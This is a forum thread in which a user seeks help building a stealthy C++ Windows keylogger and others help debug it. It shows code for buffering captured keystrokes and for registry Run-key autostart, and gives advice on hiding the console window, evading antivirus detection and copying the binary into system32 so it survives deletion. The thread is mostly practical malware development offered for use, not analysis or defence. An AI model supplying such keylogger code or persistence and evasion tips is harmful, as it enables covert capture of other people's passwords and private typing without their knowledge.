(C++) keylogger code question
- Still_Learning
- Fame ! Where are the chicks?!
- Posts: 1040
- Joined: 11 Jun 2008, 16:00
- 15
- Location: Trigger City
(C++) keylogger code question
Ok I have this code, and it works but for some reason it does not save that much to the text file that has all the keystrokes in it (it only saves a keylogged file of like the newest 5 lines or 10 words). Im trying to get it to save everything typed in within a 24 hour period or so, not just the last 10 words typed. I tried changeing #'s in the variables and such to get it to save more information then a 1k textfile but have not gotten it to work yet, it also flashs a small black dos screen for like half of a second when loaded which would be noticable for a user running it, i posted the link for the code below, thanks
http://code.suck-o.com/92
http://code.suck-o.com/92
Well it seems like when the logfile reaches "LogLength" it will close the file and then reopen it, causing the data to be overwritten. So I guess you could either change the "LogLength" limit, or rewrite the if statement further down so that it stops at a specific time.
It's odd though, because it reads it into buffer, and then closes the file. Then opens it again. You would think that it would flush the buffer into the file again after that. But it has a maximum buffer, and also it has a "sleep 10" further up to make it not use 100% cpu.
Changing this if statement, seems to be the most logical thing to do ^^, I haven't read all the code, but that's my conclusion from just waking up.
It's odd though, because it reads it into buffer, and then closes the file. Then opens it again. You would think that it would flush the buffer into the file again after that. But it has a maximum buffer, and also it has a "sleep 10" further up to make it not use 100% cpu.
Changing this if statement, seems to be the most logical thing to do ^^, I haven't read all the code, but that's my conclusion from just waking up.
Code: Select all
if(len>=LogLength)
{
fseek(file,0,SEEK_SET);//go to beg.
buf=(char *)malloc(len);//malloc buffer
freadindex=fread(buf,1,len,file);//read into buffer
buf[freadindex] = '\0';//Extra bit I have to add to make it a sting
fclose(file);
file = fopen(FileName,"w");
}
"The best place to hide a tree, is in a forest"
- Still_Learning
- Fame ! Where are the chicks?!
- Posts: 1040
- Joined: 11 Jun 2008, 16:00
- 15
- Location: Trigger City
I tried changing to log length from 100 to 1000 but did not see a difference when the log file was created.
Wouldnt not useing 100% be more stealth? as of now i ran it threw AVG scanner and it is undetectable, but Comodo firewall catches it (if you read the info before clicking "Allow")..
what would you recommend changeing in the IF statement? Im a noob at this , this is my first C++ project i guess, but am learning alot by doing this , thanks Cats!
Wouldnt not useing 100% be more stealth? as of now i ran it threw AVG scanner and it is undetectable, but Comodo firewall catches it (if you read the info before clicking "Allow")..
what would you recommend changeing in the IF statement? Im a noob at this , this is my first C++ project i guess, but am learning alot by doing this , thanks Cats!
Well there are some oddities in the code, and I can't really go through it all at the moment (studying for an exam), but you can try to remove or lessen "sleep 10", to "sleep 1" or something, to see if it does anything. Because as it looks now, it puts the whole program to sleep for 10 seconds, then continues to check for keys, but i guess it would work if it reads from the buffer and then flushes to the file.
I can take a closer look at it later, the "check char" part looks pretty good though ^^.
I can take a closer look at it later, the "check char" part looks pretty good though ^^.
"The best place to hide a tree, is in a forest"
- Still_Learning
- Fame ! Where are the chicks?!
- Posts: 1040
- Joined: 11 Jun 2008, 16:00
- 15
- Location: Trigger City
Ok, I think i have it working now.. the only question now i guess is why wont it run automatically when windows starts up? I can see where the registry key was added with the code
when i run it, i can see it in the processess and see the key logging working, but on restart it does not seem to be working / autorun..
what am i doing wrong
so far i want the keylogger to auto start on windows boot and write to the log file , thats it.. and to make it as stealth as possible so far, ive gotten it to just flash a black dos screen for like half a second, no flashing screen would be best though.. any sugestions for a fix?
the new code is at http://code.suck-o.com/93
Code: Select all
/* Grab filename of process/exe using GetModuleFileName() function. */
TCHAR szPath[MAX_PATH];
GetModuleFileName(NULL,
szPath,
MAX_PATH);
/* Create a New HKEY. */
HKEY newValue;
/* Open Registry key. */
RegOpenKey(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
&newValue);
/* Note use HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add for the
current user only.
Now give a new value.
Syntax for RegSetValueEx() function is
LONG WINAPI RegSetValueEx(
__in HKEY hKey,
__in_opt LPCTSTR lpValueName,
__reserved DWORD Reserved,
__in DWORD dwType,
__in_opt const BYTE* lpData,
__in DWORD cbData
);
More info at http://msdn2.microsoft.com/en-us/library/ms724923.aspx */
RegSetValueEx(newValue,
"keylogger2.exe",
0,
REG_SZ,
(LPBYTE)szPath,
sizeof(szPath));
/* Close the key. */
RegCloseKey(newValue);
return 0;
what am i doing wrong
so far i want the keylogger to auto start on windows boot and write to the log file , thats it.. and to make it as stealth as possible so far, ive gotten it to just flash a black dos screen for like half a second, no flashing screen would be best though.. any sugestions for a fix?
the new code is at http://code.suck-o.com/93
well did you check the registry to see that it adds the key? and is your file named "keylogger2.exe" as it says in the code? and is the path for the file added correctly.
A tip is to make a syscall and have the system copy the file to a specified location (like system32) and then make the key point to the file there, so even if the user removes the file that he/she ran, it would still run from system32 the next time. Also, make sure that the program "checks" if the file exists in system32, before it tries to copy the file (no use doing it if it already exists)
A tip is to make a syscall and have the system copy the file to a specified location (like system32) and then make the key point to the file there, so even if the user removes the file that he/she ran, it would still run from system32 the next time. Also, make sure that the program "checks" if the file exists in system32, before it tries to copy the file (no use doing it if it already exists)
"The best place to hide a tree, is in a forest"
- Still_Learning
- Fame ! Where are the chicks?!
- Posts: 1040
- Joined: 11 Jun 2008, 16:00
- 15
- Location: Trigger City
- Still_Learning
- Fame ! Where are the chicks?!
- Posts: 1040
- Joined: 11 Jun 2008, 16:00
- 15
- Location: Trigger City
humm... how would I make it to log up to say 5 MB of keys, then it will keep overwriteing the oldest text with newer after it hits the 5MB mark?
I am not sure how to define the filesize..
or why it is not booting along with windows ...
Bad Brain, DNR, Floodhoundz, anyone else have an idea or helpful advice? the code compiles and works, but not how i want it to yet, thanks
I am not sure how to define the filesize..
or why it is not booting along with windows ...
Bad Brain, DNR, Floodhoundz, anyone else have an idea or helpful advice? the code compiles and works, but not how i want it to yet, thanks
Well, as mentioned in the code....
Try that instead (it should work anyway, but since I don't have Windows, I can't and wont test the code)
Code: Select all
/* Note use HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add for the
current user only.
"The best place to hide a tree, is in a forest"
ah yes that is correct, I was referring to the system call. My apologiesqeinar wrote:the sleep function is given in milisecounds so sleep(1) would be close to nothing.. for the showing screen, it's just howl ong time it takes to execute the stealth comand your using.
"The best place to hide a tree, is in a forest"
- Still_Learning
- Fame ! Where are the chicks?!
- Posts: 1040
- Joined: 11 Jun 2008, 16:00
- 15
- Location: Trigger City
Yeah but it still showsqeinar wrote:the sleep function is given in milisecounds so sleep(1) would be close to nothing.. for the showing screen, it's just howl ong time it takes to execute the stealth comand your using.
Even with sleep(0) it flashes real quick
also am having other bugs, anyone want to co-help on making a keylogger? I am trying to learn C++ and figured this would be a nice project, cats you are also learning correct? lets collaborate on a keylogger
- Still_Learning
- Fame ! Where are the chicks?!
- Posts: 1040
- Joined: 11 Jun 2008, 16:00
- 15
- Location: Trigger City